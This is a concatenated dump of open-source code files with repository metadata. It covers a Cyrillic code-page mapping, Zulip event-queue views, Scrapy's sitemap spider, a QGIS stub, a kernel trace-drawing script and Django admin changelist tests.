0x0412: 0x00ec, # CYRILLIC CAPITAL LETTER VE
0x0413: 0x00ad, # CYRILLIC CAPITAL LETTER GHE
0x0414: 0x00a7, # CYRILLIC CAPITAL LETTER DE
0x0415: 0x00a9, # CYRILLIC CAPITAL LETTER IE
0x0416: 0x00ea, # CYRILLIC CAPITAL LETTER ZHE
0x0417: 0x00f4, # CYRILLIC CAPITAL LETTER ZE
0x0418: 0x00b8, # CYRILLIC CAPITAL LETTER I
0x0419: 0x00be, # CYRILLIC CAPITAL LETTER SHORT I
0x041a: 0x00c7, # CYRILLIC CAPITAL LETTER KA
0x041b: 0x00d1, # CYRILLIC CAPITAL LETTER EL
0x041c: 0x00d3, # CYRILLIC CAPITAL LETTER EM
0x041d: 0x00d5, # CYRILLIC CAPITAL LETTER EN
0x041e: 0x00d7, # CYRILLIC CAPITAL LETTER O
0x041f: 0x00dd, # CYRILLIC CAPITAL LETTER PE
0x0420: 0x00e2, # CYRILLIC CAPITAL LETTER ER
0x0421: 0x00e4, # CYRILLIC CAPITAL LETTER ES
0x0422: 0x00e6, # CYRILLIC CAPITAL LETTER TE
0x0423: 0x00e8, # CYRILLIC CAPITAL LETTER U
0x0424: 0x00ab, # CYRILLIC CAPITAL LETTER EF
0x0425: 0x00b6, # CYRILLIC CAPITAL LETTER HA
0x0426: 0x00a5, # CYRILLIC CAPITAL LETTER TSE
0x0427: 0x00fc, # CYRILLIC CAPITAL LETTER CHE
0x0428: 0x00f6, # CYRILLIC CAPITAL LETTER SHA
0x0429: 0x00fa, # CYRILLIC CAPITAL LETTER SHCHA
0x042a: 0x009f, # CYRILLIC CAPITAL LETTER HARD SIGN
0x042b: 0x00f2, # CYRILLIC CAPITAL LETTER YERU
0x042c: 0x00ee, # CYRILLIC CAPITAL LETTER SOFT SIGN
0x042d: 0x00f8, # CYRILLIC CAPITAL LETTER E
0x042e: 0x009d, # CYRILLIC CAPITAL LETTER YU
0x042f: 0x00e0, # CYRILLIC CAPITAL LETTER YA
0x0430: 0x00a0, # CYRILLIC SMALL LETTER A
0x0431: 0x00a2, # CYRILLIC SMALL LETTER BE
0x0432: 0x00eb, # CYRILLIC SMALL LETTER VE
0x0433: 0x00ac, # CYRILLIC SMALL LETTER GHE
0x0434: 0x00a6, # CYRILLIC SMALL LETTER DE
0x0435: 0x00a8, # CYRILLIC SMALL LETTER IE
0x0436: 0x00e9, # CYRILLIC SMALL LETTER ZHE
0x0437: 0x00f3, # CYRILLIC SMALL LETTER ZE
0x0438: 0x00b7, # CYRILLIC SMALL LETTER I
0x0439: 0x00bd, # CYRILLIC SMALL LETTER SHORT I
0x043a: 0x00c6, # CYRILLIC SMALL LETTER KA
0x043b: 0x00d0, # CYRILLIC SMALL LETTER EL
0x043c: 0x00d2, # CYRILLIC SMALL LETTER EM
0x043d: 0x00d4, # CYRILLIC SMALL LETTER EN
0x043e: 0x00d6, # CYRILLIC SMALL LETTER O
0x043f: 0x00d8, # CYRILLIC SMALL LETTER PE
0x0440: 0x00e1, # CYRILLIC SMALL LETTER ER
0x0441: 0x00e3, # CYRILLIC SMALL LETTER ES
0x0442: 0x00e5, # CYRILLIC SMALL LETTER TE
0x0443: 0x00e7, # CYRILLIC SMALL LETTER U
0x0444: 0x00aa, # CYRILLIC SMALL LETTER EF
0x0445: 0x00b5, # CYRILLIC SMALL LETTER HA
0x0446: 0x00a4, # CYRILLIC SMALL LETTER TSE
0x0447: 0x00fb, # CYRILLIC SMALL LETTER CHE
0x0448: 0x00f5, # CYRILLIC SMALL LETTER SHA
0x0449: 0x00f9, # CYRILLIC SMALL LETTER SHCHA
0x044a: 0x009e, # CYRILLIC SMALL LETTER HARD SIGN
0x044b: 0x00f1, # CYRILLIC SMALL LETTER YERU
0x044c: 0x00ed, # CYRILLIC SMALL LETTER SOFT SIGN
0x044d: 0x00f7, # CYRILLIC SMALL LETTER E
0x044e: 0x009c, # CYRILLIC SMALL LETTER YU
0x044f: 0x00de, # CYRILLIC SMALL LETTER YA
0x0451: 0x0084, # CYRILLIC SMALL LETTER IO
0x0452: 0x0080, # CYRILLIC SMALL LETTER DJE
0x0453: 0x0082, # CYRILLIC SMALL LETTER GJE
0x0454: 0x0086, # CYRILLIC SMALL LETTER UKRAINIAN IE
0x0455: 0x0088, # CYRILLIC SMALL LETTER DZE
0x0456: 0x008a, # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
0x0457: 0x008c, # CYRILLIC SMALL LETTER YI
0x0458: 0x008e, # CYRILLIC SMALL LETTER JE
0x0459: 0x0090, # CYRILLIC SMALL LETTER LJE
0x045a: 0x0092, # CYRILLIC SMALL LETTER NJE
0x045b: 0x0094, # CYRILLIC SMALL LETTER TSHE
0x045c: 0x0096, # CYRILLIC SMALL LETTER KJE
0x045e: 0x0098, # CYRILLIC SMALL LETTER SHORT U
0x045f: 0x009a, # CYRILLIC SMALL LETTER DZHE
0x2116: 0x00ef, # NUMERO SIGN
0x2500: 0x00c4, # BOX DRAWINGS LIGHT HORIZONTAL
0x2502: 0x00b3, # BOX DRAWINGS LIGHT VERTICAL
0x250c: 0x00da, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x2510: 0x00bf, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x2514: 0x00c0, # BOX DRAWINGS LIGHT UP AND RIGHT
0x2518: 0x00d9, # BOX DRAWINGS LIGHT UP AND LEFT
0x251c: 0x00c3, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x2524: 0x00b4, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x252c: 0x00c2, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x2534: 0x00c1, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x253c: 0x00c5, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x2550: 0x00cd, # BOX DRAWINGS DOUBLE HORIZONTAL
0x2551: 0x00ba, # BOX DRAWINGS DOUBLE VERTICAL
0x2554: 0x00c9, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x2557: 0x00bb, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x255a: 0x00c8, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x255d: 0x00bc, # BOX DRAWINGS DOUBLE UP AND LEFT
0x2560: 0x00cc, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x2563: 0x00b9, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x2566: 0x00cb, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x2569: 0x00ca, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x256c: 0x00ce, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x2580: 0x00df, # UPPER HALF BLOCK
0x2584: 0x00dc, # LOWER HALF BLOCK
0x2588: 0x00db, # FULL BLOCK
0x2591: 0x00b0, # LIGHT SHADE
0x2592: 0x00b1, # MEDIUM SHADE
0x2593: 0x00b2, # DARK SHADE
0x25a0: 0x00fe, # BLACK SQUARE
}
| apache-2.0 |
zorojean/zulip | zerver/tornadoviews.py | 120 | 4177 | from __future__ import absolute_import
from django.views.decorators.csrf import csrf_exempt
from zerver.models import get_client
from zerver.decorator import asynchronous, \
authenticated_json_post_view, internal_notify_view, RespondAsynchronously, \
has_request_variables, REQ
from zerver.lib.response import json_success, json_error
from zerver.lib.validator import check_bool, check_list, check_string
from zerver.lib.event_queue import allocate_client_descriptor, get_client_descriptor, \
process_notification
from zerver.lib.narrow import check_supported_events_narrow_filter
import ujson
import logging
from zerver.lib.rest import rest_dispatch as _rest_dispatch
rest_dispatch = csrf_exempt((lambda request, *args, **kwargs: _rest_dispatch(request, globals(), *args, **kwargs)))
@internal_notify_view
def notify(request):
process_notification(ujson.loads(request.POST['data']))
return json_success()
@has_request_variables
def cleanup_event_queue(request, user_profile, queue_id=REQ()):
client = get_client_descriptor(queue_id)
if client is None:
return json_error("Bad event queue id: %s" % (queue_id,))
if user_profile.id != client.user_profile_id:
return json_error("You are not authorized to access this queue")
request._log_data['extra'] = "[%s]" % (queue_id,)
client.cleanup()
return json_success()
@authenticated_json_post_view
def json_get_events(request, user_profile):
return get_events_backend(request, user_profile, apply_markdown=True)
@asynchronous
@has_request_variables
def get_events_backend(request, user_profile, handler = None,
user_client = REQ(converter=get_client, default=None),
last_event_id = REQ(converter=int, default=None),
queue_id = REQ(default=None),
apply_markdown = REQ(default=False, validator=check_bool),
all_public_streams = REQ(default=False, validator=check_bool),
event_types = REQ(default=None, validator=check_list(check_string)),
dont_block = REQ(default=False, validator=check_bool),
narrow = REQ(default=[], validator=check_list(None)),
lifespan_secs = REQ(default=0, converter=int)):
if user_client is None:
user_client = request.client
was_connected = False
orig_queue_id = queue_id
if queue_id is None:
if dont_block:
client = allocate_client_descriptor(user_profile.id, user_profile.realm.id,
event_types, user_client, apply_markdown,
all_public_streams, lifespan_secs,
narrow=narrow)
queue_id = client.event_queue.id
else:
return json_error("Missing 'queue_id' argument")
else:
if last_event_id is None:
return json_error("Missing 'last_event_id' argument")
client = get_client_descriptor(queue_id)
if client is None:
return json_error("Bad event queue id: %s" % (queue_id,))
if user_profile.id != client.user_profile_id:
return json_error("You are not authorized to get events from this queue")
client.event_queue.prune(last_event_id)
was_connected = client.finish_current_handler()
if not client.event_queue.empty() or dont_block:
ret = {'events': client.event_queue.contents()}
if orig_queue_id is None:
ret['queue_id'] = queue_id
request._log_data['extra'] = "[%s/%s]" % (queue_id, len(ret["events"]))
if was_connected:
request._log_data['extra'] += " [was connected]"
return json_success(ret)
handler._request = request
if was_connected:
logging.info("Disconnected handler for queue %s (%s/%s)" % (queue_id, user_profile.email,
user_client.name))
client.connect_handler(handler)
# runtornado recognizes this special return value.
return RespondAsynchronously
| apache-2.0 |
profjrr/scrapy | scrapy/spiders/sitemap.py | 56 | 2706 | import re
import logging
from scrapy.spiders import Spider
from scrapy.http import Request, XmlResponse
from scrapy.utils.sitemap import Sitemap, sitemap_urls_from_robots
from scrapy.utils.gz import gunzip, is_gzipped
logger = logging.getLogger(__name__)
class SitemapSpider(Spider):
sitemap_urls = ()
sitemap_rules = [('', 'parse')]
sitemap_follow = ['']
sitemap_alternate_links = False
def __init__(self, *a, **kw):
super(SitemapSpider, self).__init__(*a, **kw)
self._cbs = []
for r, c in self.sitemap_rules:
if isinstance(c, basestring):
c = getattr(self, c)
self._cbs.append((regex(r), c))
self._follow = [regex(x) for x in self.sitemap_follow]
def start_requests(self):
return (Request(x, callback=self._parse_sitemap) for x in self.sitemap_urls)
def _parse_sitemap(self, response):
if response.url.endswith('/robots.txt'):
for url in sitemap_urls_from_robots(response.body):
yield Request(url, callback=self._parse_sitemap)
else:
body = self._get_sitemap_body(response)
if body is None:
logger.warning("Ignoring invalid sitemap: %(response)s",
{'response': response}, extra={'spider': self})
return
s = Sitemap(body)
if s.type == 'sitemapindex':
for loc in iterloc(s, self.sitemap_alternate_links):
if any(x.search(loc) for x in self._follow):
yield Request(loc, callback=self._parse_sitemap)
elif s.type == 'urlset':
for loc in iterloc(s):
for r, c in self._cbs:
if r.search(loc):
yield Request(loc, callback=c)
break
def _get_sitemap_body(self, response):
"""Return the sitemap body contained in the given response, or None if the
response is not a sitemap.
"""
if isinstance(response, XmlResponse):
return response.body
elif is_gzipped(response):
return gunzip(response.body)
elif response.url.endswith('.xml'):
return response.body
elif response.url.endswith('.xml.gz'):
return gunzip(response.body)
def regex(x):
if isinstance(x, basestring):
return re.compile(x)
return x
def iterloc(it, alt=False):
for d in it:
yield d['loc']
# Also consider alternate URLs (xhtml:link rel="alternate")
if alt and 'alternate' in d:
for l in d['alternate']:
yield l
| bsd-3-clause |
luofei98/qgis | python/plugins/processing/algs/grass7/ext/r_describe.py | 20 | 1216 | # -*- coding: utf-8 -*-
"""
***************************************************************************
r_describe.py
---------------------
Date : December 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'December 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import HtmlReportPostProcessor
def postProcessResults(alg):
HtmlReportPostProcessor.postProcessResults(alg)
| gpl-2.0 |
standak3/m8_ul_4.4.2_muj | scripts/tracing/draw_functrace.py | 14676 | 3560 | #!/usr/bin/python
"""
Copyright 2008 (c) Frederic Weisbecker <fweisbec@gmail.com>
Licensed under the terms of the GNU GPL License version 2
This script parses a trace provided by the function tracer in
kernel/trace/trace_functions.c
The resulted trace is processed into a tree to produce a more human
view of the call stack by drawing textual but hierarchical tree of
calls. Only the functions's names and the the call time are provided.
Usage:
Be sure that you have CONFIG_FUNCTION_TRACER
# mount -t debugfs nodev /sys/kernel/debug
# echo function > /sys/kernel/debug/tracing/current_tracer
$ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func
Wait some times but not too much, the script is a bit slow.
Break the pipe (Ctrl + Z)
$ scripts/draw_functrace.py < raw_trace_func > draw_functrace
Then you have your drawn trace in draw_functrace
"""
import sys, re
class CallTree:
""" This class provides a tree representation of the functions
call stack. If a function has no parent in the kernel (interrupt,
syscall, kernel thread...) then it is attached to a virtual parent
called ROOT.
"""
ROOT = None
def __init__(self, func, time = None, parent = None):
self._func = func
self._time = time
if parent is None:
self._parent = CallTree.ROOT
else:
self._parent = parent
self._children = []
def calls(self, func, calltime):
""" If a function calls another one, call this method to insert it
into the tree at the appropriate place.
@return: A reference to the newly created child node.
"""
child = CallTree(func, calltime, self)
self._children.append(child)
return child
def getParent(self, func):
""" Retrieve the last parent of the current node that
has the name given by func. If this function is not
on a parent, then create it as new child of root
@return: A reference to the parent.
"""
tree = self
while tree != CallTree.ROOT and tree._func != func:
tree = tree._parent
if tree == CallTree.ROOT:
child = CallTree.ROOT.calls(func, None)
return child
return tree
def __repr__(self):
return self.__toString("", True)
def __toString(self, branch, lastChild):
if self._time is not None:
s = "%s----%s (%s)\n" % (branch, self._func, self._time)
else:
s = "%s----%s\n" % (branch, self._func)
i = 0
if lastChild:
branch = branch[:-1] + " "
while i < len(self._children):
if i != len(self._children) - 1:
s += "%s" % self._children[i].__toString(branch +\
" |", False)
else:
s += "%s" % self._children[i].__toString(branch +\
" |", True)
i += 1
return s
class BrokenLineException(Exception):
"""If the last line is not complete because of the pipe breakage,
we want to stop the processing and ignore this line.
"""
pass
class CommentLineException(Exception):
""" If the line is a comment (as in the beginning of the trace file),
just ignore it.
"""
pass
def parseLine(line):
line = line.strip()
if line.startswith("#"):
raise CommentLineException
m = re.match("[^]]+?\\] +([0-9.]+): (\\w+) <-(\\w+)", line)
if m is None:
raise BrokenLineException
return (m.group(1), m.group(2), m.group(3))
def main():
CallTree.ROOT = CallTree("Root (Nowhere)", None, None)
tree = CallTree.ROOT
for line in sys.stdin:
try:
calltime, callee, caller = parseLine(line)
except BrokenLineException:
break
except CommentLineException:
continue
tree = tree.getParent(caller)
tree = tree.calls(callee, calltime)
print CallTree.ROOT
if __name__ == "__main__":
main()
| gpl-2.0 |
rizumu/django | tests/admin_changelist/tests.py | 29 | 37484 | from __future__ import unicode_literals
import datetime
from django.contrib import admin
from django.contrib.admin.models import LogEntry
from django.contrib.admin.options import IncorrectLookupParameters
from django.contrib.admin.templatetags.admin_list import pagination
from django.contrib.admin.tests import AdminSeleniumWebDriverTestCase
from django.contrib.admin.views.main import ALL_VAR, SEARCH_VAR, ChangeList
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.core.urlresolvers import reverse
from django.template import Context, Template
from django.test import TestCase, ignore_warnings, override_settings
from django.test.client import RequestFactory
from django.utils import formats, six
from django.utils.deprecation import RemovedInDjango20Warning
from .admin import (
BandAdmin, ChildAdmin, ChordsBandAdmin, ConcertAdmin,
CustomPaginationAdmin, CustomPaginator, DynamicListDisplayChildAdmin,
DynamicListDisplayLinksChildAdmin, DynamicListFilterChildAdmin,
DynamicSearchFieldsChildAdmin, EmptyValueChildAdmin, FilteredChildAdmin,
GroupAdmin, InvitationAdmin, NoListDisplayLinksParentAdmin, ParentAdmin,
QuartetAdmin, SwallowAdmin, site as custom_site,
)
from .models import (
Band, Child, ChordsBand, ChordsMusician, Concert, CustomIdUser, Event,
Genre, Group, Invitation, Membership, Musician, OrderedObject, Parent,
Quartet, Swallow, SwallowOneToOne, UnorderedObject,
)
def get_changelist_args(modeladmin, **kwargs):
m = modeladmin
args = (
kwargs.pop('list_display', m.list_display),
kwargs.pop('list_display_links', m.list_display_links),
kwargs.pop('list_filter', m.list_filter),
kwargs.pop('date_hierarchy', m.date_hierarchy),
kwargs.pop('search_fields', m.search_fields),
kwargs.pop('list_select_related', m.list_select_related),
kwargs.pop('list_per_page', m.list_per_page),
kwargs.pop('list_max_show_all', m.list_max_show_all),
kwargs.pop('list_editable', m.list_editable),
m,
)
assert not kwargs, "Unexpected kwarg %s" % kwargs
return args
@override_settings(ROOT_URLCONF="admin_changelist.urls")
class ChangeListTests(TestCase):
def setUp(self):
self.factory = RequestFactory()
def _create_superuser(self, username):
return User.objects.create(username=username, is_superuser=True)
def _mocked_authenticated_request(self, url, user):
request = self.factory.get(url)
request.user = user
return request
def test_select_related_preserved(self):
"""
Regression test for #10348: ChangeList.get_queryset() shouldn't
overwrite a custom select_related provided by ModelAdmin.get_queryset().
"""
m = ChildAdmin(Child, custom_site)
request = self.factory.get('/child/')
cl = ChangeList(
request, Child,
*get_changelist_args(m, list_select_related=m.get_list_select_related(request))
)
self.assertEqual(cl.queryset.query.select_related, {
'parent': {'name': {}}
})
def test_select_related_as_tuple(self):
ia = InvitationAdmin(Invitation, custom_site)
request = self.factory.get('/invitation/')
cl = ChangeList(
request, Child,
*get_changelist_args(ia, list_select_related=ia.get_list_select_related(request))
)
self.assertEqual(cl.queryset.query.select_related, {'player': {}})
def test_select_related_as_empty_tuple(self):
ia = InvitationAdmin(Invitation, custom_site)
ia.list_select_related = ()
request = self.factory.get('/invitation/')
cl = ChangeList(
request, Child,
*get_changelist_args(ia, list_select_related=ia.get_list_select_related(request))
)
self.assertEqual(cl.queryset.query.select_related, False)
def test_get_select_related_custom_method(self):
class GetListSelectRelatedAdmin(admin.ModelAdmin):
list_display = ('band', 'player')
def get_list_select_related(self, request):
return ('band', 'player')
ia = GetListSelectRelatedAdmin(Invitation, custom_site)
request = self.factory.get('/invitation/')
cl = ChangeList(
request, Child,
*get_changelist_args(ia, list_select_related=ia.get_list_select_related(request))
)
self.assertEqual(cl.queryset.query.select_related, {'player': {}, 'band': {}})
def test_result_list_empty_changelist_value(self):
"""
Regression test for #14982: EMPTY_CHANGELIST_VALUE should be honored
for relationship fields
"""
new_child = Child.objects.create(name='name', parent=None)
request = self.factory.get('/child/')
m = ChildAdmin(Child, custom_site)
cl = ChangeList(request, Child, *get_changelist_args(m))
cl.formset = None
template = Template('{% load admin_list %}{% spaceless %}{% result_list cl %}{% endspaceless %}')
context = Context({'cl': cl})
table_output = template.render(context)
link = reverse('admin:admin_changelist_child_change', args=(new_child.id,))
row_html = (
'<tbody><tr class="row1"><th class="field-name"><a href="%s">name</a></th>'
'<td class="field-parent nowrap">-</td></tr></tbody>' % link
)
self.assertNotEqual(table_output.find(row_html), -1,
'Failed to find expected row element: %s' % table_output)
def test_result_list_set_empty_value_display_on_admin_site(self):
"""
Test that empty value display can be set on AdminSite
"""
new_child = Child.objects.create(name='name', parent=None)
request = self.factory.get('/child/')
# Set a new empty display value on AdminSite.
admin.site.empty_value_display = '???'
m = ChildAdmin(Child, admin.site)
cl = ChangeList(request, Child, *get_changelist_args(m))
cl.formset = None
template = Template('{% load admin_list %}{% spaceless %}{% result_list cl %}{% endspaceless %}')
context = Context({'cl': cl})
table_output = template.render(context)
link = reverse('admin:admin_changelist_child_change', args=(new_child.id,))
row_html = (
'<tbody><tr class="row1"><th class="field-name"><a href="%s">name</a></th>'
'<td class="field-parent nowrap">???</td></tr></tbody>' % link
)
self.assertNotEqual(table_output.find(row_html), -1,
'Failed to find expected row element: %s' % table_output)
def test_result_list_set_empty_value_display_in_model_admin(self):
"""
Test that empty value display can be set in ModelAdmin or individual fields.
"""
new_child = Child.objects.create(name='name', parent=None)
request = self.factory.get('/child/')
m = EmptyValueChildAdmin(Child, admin.site)
cl = ChangeList(request, Child, *get_changelist_args(m))
cl.formset = None
template = Template('{% load admin_list %}{% spaceless %}{% result_list cl %}{% endspaceless %}')
context = Context({'cl': cl})
table_output = template.render(context)
link = reverse('admin:admin_changelist_child_change', args=(new_child.id,))
row_html = (
'<tbody><tr class="row1"><th class="field-name"><a href="%s">name</a></th>'
'<td class="field-age_display">&dagger;</td><td class="field-age">-empty-</td></tr></tbody>' % link
)
self.assertNotEqual(table_output.find(row_html), -1,
'Failed to find expected row element: %s' % table_output)
def test_result_list_html(self):
"""
Verifies that inclusion tag result_list generates a table when with
default ModelAdmin settings.
"""
new_parent = Parent.objects.create(name='parent')
new_child = Child.objects.create(name='name', parent=new_parent)
request = self.factory.get('/child/')
m = ChildAdmin(Child, custom_site)
cl = ChangeList(request, Child, *get_changelist_args(m))
cl.formset = None
template = Template('{% load admin_list %}{% spaceless %}{% result_list cl %}{% endspaceless %}')
context = Context({'cl': cl})
table_output = template.render(context)
link = reverse('admin:admin_changelist_child_change', args=(new_child.id,))
row_html = (
'<tbody><tr class="row1"><th class="field-name"><a href="%s">name</a></th>'
'<td class="field-parent nowrap">Parent object</td></tr></tbody>' % link
)
self.assertNotEqual(table_output.find(row_html), -1,
'Failed to find expected row element: %s' % table_output)
def test_result_list_editable_html(self):
"""
Regression tests for #11791: Inclusion tag result_list generates a
table and this checks that the items are nested within the table
element tags.
Also a regression test for #13599, verifies that hidden fields
when list_editable is enabled are rendered in a div outside the
table.
"""
new_parent = Parent.objects.create(name='parent')
new_child = Child.objects.create(name='name', parent=new_parent)
request = self.factory.get('/child/')
m = ChildAdmin(Child, custom_site)
# Test with list_editable fields
m.list_display = ['id', 'name', 'parent']
m.list_display_links = ['id']
m.list_editable = ['name']
cl = ChangeList(request, Child, *get_changelist_args(m))
FormSet = m.get_changelist_formset(request)
cl.formset = FormSet(queryset=cl.result_list)
template = Template('{% load admin_list %}{% spaceless %}{% result_list cl %}{% endspaceless %}')
context = Context({'cl': cl})
table_output = template.render(context)
# make sure that hidden fields are in the correct place
hiddenfields_div = (
'<div class="hiddenfields">'
'<input type="hidden" name="form-0-id" value="%d" id="id_form-0-id" />'
'</div>'
) % new_child.id
self.assertInHTML(hiddenfields_div, table_output, msg_prefix='Failed to find hidden fields')
# make sure that list editable fields are rendered in divs correctly
editable_name_field = (
'<input name="form-0-name" value="name" class="vTextField" '
'maxlength="30" type="text" id="id_form-0-name" />'
)
self.assertInHTML(
'<td class="field-name">%s</td>' % editable_name_field,
table_output,
msg_prefix='Failed to find "name" list_editable field',
)
def test_result_list_editable(self):
"""
Regression test for #14312: list_editable with pagination
"""
new_parent = Parent.objects.create(name='parent')
for i in range(200):
Child.objects.create(name='name %s' % i, parent=new_parent)
request = self.factory.get('/child/', data={'p': -1}) # Anything outside range
m = ChildAdmin(Child, custom_site)
# Test with list_editable fields
m.list_display = ['id', 'name', 'parent']
m.list_display_links = ['id']
m.list_editable = ['name']
with self.assertRaises(IncorrectLookupParameters):
ChangeList(request, Child, *get_changelist_args(m))
@ignore_warnings(category=RemovedInDjango20Warning)
def test_result_list_with_allow_tags(self):
"""
Test for deprecation of allow_tags attribute
"""
new_parent = Parent.objects.create(name='parent')
for i in range(2):
Child.objects.create(name='name %s' % i, parent=new_parent)
request = self.factory.get('/child/')
m = ChildAdmin(Child, custom_site)
def custom_method(self, obj=None):
return 'Unsafe html <br />'
custom_method.allow_tags = True
# Add custom method with allow_tags attribute
m.custom_method = custom_method
m.list_display = ['id', 'name', 'parent', 'custom_method']
cl = ChangeList(request, Child, *get_changelist_args(m))
FormSet = m.get_changelist_formset(request)
cl.formset = FormSet(queryset=cl.result_list)
template = Template('{% load admin_list %}{% spaceless %}{% result_list cl %}{% endspaceless %}')
context = Context({'cl': cl})
table_output = template.render(context)
custom_field_html = '<td class="field-custom_method">Unsafe html <br /></td>'
self.assertInHTML(custom_field_html, table_output)
def test_custom_paginator(self):
new_parent = Parent.objects.create(name='parent')
for i in range(200):
Child.objects.create(name='name %s' % i, parent=new_parent)
request = self.factory.get('/child/')
m = CustomPaginationAdmin(Child, custom_site)
cl = ChangeList(request, Child, *get_changelist_args(m))
cl.get_results(request)
self.assertIsInstance(cl.paginator, CustomPaginator)
def test_distinct_for_m2m_in_list_filter(self):
"""
Regression test for #13902: When using a ManyToMany in list_filter,
results shouldn't appear more than once. Basic ManyToMany.
"""
blues = Genre.objects.create(name='Blues')
band = Band.objects.create(name='B.B. King Review', nr_of_members=11)
band.genres.add(blues)
band.genres.add(blues)
m = BandAdmin(Band, custom_site)
request = self.factory.get('/band/', data={'genres': blues.pk})
cl = ChangeList(request, Band, *get_changelist_args(m))
cl.get_results(request)
# There's only one Group instance
self.assertEqual(cl.result_count, 1)
def test_distinct_for_through_m2m_in_list_filter(self):
"""
Regression test for #13902: When using a ManyToMany in list_filter,
results shouldn't appear more than once. With an intermediate model.
"""
lead = Musician.objects.create(name='Vox')
band = Group.objects.create(name='The Hype')
Membership.objects.create(group=band, music=lead, role='lead voice')
Membership.objects.create(group=band, music=lead, role='bass player')
m = GroupAdmin(Group, custom_site)
request = self.factory.get('/group/', data={'members': lead.pk})
cl = ChangeList(request, Group, *get_changelist_args(m))
cl.get_results(request)
# There's only one Group instance
self.assertEqual(cl.result_count, 1)
def test_distinct_for_through_m2m_at_second_level_in_list_filter(self):
"""
When using a ManyToMany in list_filter at the second level behind a
ForeignKey, distinct() must be called and results shouldn't appear more
than once.
"""
lead = Musician.objects.create(name='Vox')
band = Group.objects.create(name='The Hype')
Concert.objects.create(name='Woodstock', group=band)
Membership.objects.create(group=band, music=lead, role='lead voice')
Membership.objects.create(group=band, music=lead, role='bass player')
m = ConcertAdmin(Concert, custom_site)
request = self.factory.get('/concert/', data={'group__members': lead.pk})
cl = ChangeList(request, Concert, *get_changelist_args(m))
cl.get_results(request)
# There's only one Concert instance
self.assertEqual(cl.result_count, 1)
def test_distinct_for_inherited_m2m_in_list_filter(self):
"""
Regression test for #13902: When using a ManyToMany in list_filter,
results shouldn't appear more than once. Model managed in the
admin inherits from the one that defins the relationship.
"""
lead = Musician.objects.create(name='John')
four = Quartet.objects.create(name='The Beatles')
Membership.objects.create(group=four, music=lead, role='lead voice')
Membership.objects.create(group=four, music=lead, role='guitar player')
m = QuartetAdmin(Quartet, custom_site)
request = self.factory.get('/quartet/', data={'members': lead.pk})
cl = ChangeList(request, Quartet, *get_changelist_args(m))
cl.get_results(request)
# There's only one Quartet instance
self.assertEqual(cl.result_count, 1)
def test_distinct_for_m2m_to_inherited_in_list_filter(self):
"""
Regression test for #13902: When using a ManyToMany in list_filter,
results shouldn't appear more than once. Target of the relationship
inherits from another.
"""
lead = ChordsMusician.objects.create(name='Player A')
three = ChordsBand.objects.create(name='The Chords Trio')
Invitation.objects.create(band=three, player=lead, instrument='guitar')
Invitation.objects.create(band=three, player=lead, instrument='bass')
m = ChordsBandAdmin(ChordsBand, custom_site)
request = self.factory.get('/chordsband/', data={'members': lead.pk})
cl = ChangeList(request, ChordsBand, *get_changelist_args(m))
cl.get_results(request)
# There's only one ChordsBand instance
self.assertEqual(cl.result_count, 1)
def test_distinct_for_non_unique_related_object_in_list_filter(self):
"""
Regressions tests for #15819: If a field listed in list_filters
is a non-unique related object, distinct() must be called.
"""
parent = Parent.objects.create(name='Mary')
# Two children with the same name
Child.objects.create(parent=parent, name='Daniel')
Child.objects.create(parent=parent, name='Daniel')
m = ParentAdmin(Parent, custom_site)
request = self.factory.get('/parent/', data={'child__name': 'Daniel'})
cl = ChangeList(request, Parent, *get_changelist_args(m))
# Make sure distinct() was called
self.assertEqual(cl.queryset.count(), 1)
def test_distinct_for_non_unique_related_object_in_search_fields(self):
"""
Regressions tests for #15819: If a field listed in search_fields
is a non-unique related object, distinct() must be called.
"""
parent = Parent.objects.create(name='Mary')
Child.objects.create(parent=parent, name='Danielle')
Child.objects.create(parent=parent, name='Daniel')
m = ParentAdmin(Parent, custom_site)
request = self.factory.get('/parent/', data={SEARCH_VAR: 'daniel'})
cl = ChangeList(request, Parent, *get_changelist_args(m))
# Make sure distinct() was called
self.assertEqual(cl.queryset.count(), 1)
def test_distinct_for_many_to_many_at_second_level_in_search_fields(self):
"""
When using a ManyToMany in search_fields at the second level behind a
ForeignKey, distinct() must be called and results shouldn't appear more
than once.
"""
lead = Musician.objects.create(name='Vox')
band = Group.objects.create(name='The Hype')
Concert.objects.create(name='Woodstock', group=band)
Membership.objects.create(group=band, music=lead, role='lead voice')
Membership.objects.create(group=band, music=lead, role='bass player')
m = ConcertAdmin(Concert, custom_site)
request = self.factory.get('/concert/', data={SEARCH_VAR: 'vox'})
cl = ChangeList(request, Concert, *get_changelist_args(m))
# There's only one Concert instance
self.assertEqual(cl.queryset.count(), 1)
def test_pagination(self):
"""
Regression tests for #12893: Pagination in admins changelist doesn't
use queryset set by modeladmin.
"""
parent = Parent.objects.create(name='anything')
for i in range(30):
Child.objects.create(name='name %s' % i, parent=parent)
Child.objects.create(name='filtered %s' % i, parent=parent)
request = self.factory.get('/child/')
# Test default queryset
m = ChildAdmin(Child, custom_site)
cl = ChangeList(request, Child, *get_changelist_args(m))
self.assertEqual(cl.queryset.count(), 60)
self.assertEqual(cl.paginator.count, 60)
